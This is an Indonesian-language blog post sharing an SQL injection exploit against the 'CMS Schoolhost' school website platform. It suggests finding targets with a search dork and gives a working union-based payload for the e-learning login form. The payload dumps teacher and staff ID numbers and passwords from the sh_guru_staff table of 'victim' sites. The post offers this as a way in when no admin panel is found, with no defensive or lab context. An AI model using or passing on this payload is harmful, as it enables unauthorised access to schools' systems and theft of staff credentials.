Yuhhhhhuuuuu.... we back.
kali ini saya akan mengShare kembali expliot cms schoolhost, yang berbeda disni adalah bila tidak menemukan "adminpanel" pada CMS SCHOOLHOST. kita bisa menggunakan celah pada kotak login E-LEARNING dan masuk sebagai guru yang tersedia pada CMS tersebut.
" untuk yang belum tau Exploit Cms Schoolhost V1 Silakan Baca "
anggap saja sudah paham, next sepesti biasa cari website tersebut dengan dork CMS Schoolhost.
POC : ' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_guru_staff)where(0x00)in(@x:=concat+(@x,0x3c62723e,nip,0x203a3a20,password))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
ini adalah metode aternatif bila adminpanel pada victim tidak ditemukan.
sekian dan terimakasih.
EmoticonEmoticon